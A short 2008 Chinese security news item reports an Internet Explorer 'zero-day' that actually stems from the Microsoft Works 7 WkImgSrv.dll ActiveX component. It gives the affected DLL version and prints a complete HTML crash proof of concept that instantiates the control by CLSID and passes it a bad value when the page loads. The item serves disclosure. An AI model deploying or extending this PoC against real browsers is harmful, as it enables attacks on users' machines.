ITBear旗下自媒體矩陣:

又一個(gè)IE 0day漏洞 - 問(wèn)題出自Microsoft Works

   時(shí)間:2008-04-18 07:45:11 來(lái)源:知道安全編輯:星輝 發(fā)表評(píng)論無(wú)障礙通道
近幾天網(wǎng)絡(luò)上流傳著一個(gè)傳說(shuō)為IE0DAY的POC代碼,在XP系統(tǒng)環(huán)境下通殺了IE6和IE7,其它系統(tǒng)并未經(jīng)過(guò)測(cè)試。其實(shí)這個(gè)漏洞并不是存在于IE,而是Microsoft Works的組件被挖掘出漏洞,部分的XP預(yù)裝了Microsoft Works,所以就出現(xiàn)了過(guò)全補(bǔ)丁系統(tǒng)的漏洞(如華碩易PC 就預(yù)裝了Microsoft Works)。

影響的DLL版本:Microsoft Works 7 WkImgSrv.dll (7.03.0616.0)

以下為crash POC

<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language=”JavaScript”>
    function payload() {
             var num = -1;
             obj.WksPictureInterface = num;
             }
   </script>
</head>
<body onload=”JavaScript: return payload();”>
<object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”>
</object>
</body>
</html>

舉報(bào) 0 收藏 0 打賞 0評(píng)論 0
 
 
更多>同類資訊
全站最新
熱門內(nèi)容
網(wǎng)站首頁(yè)  |  關(guān)于我們  |  聯(lián)系方式  |  版權(quán)聲明  |  RSS訂閱  |  開(kāi)放轉(zhuǎn)載  |  滾動(dòng)資訊  |  爭(zhēng)議稿件處理  |  English Version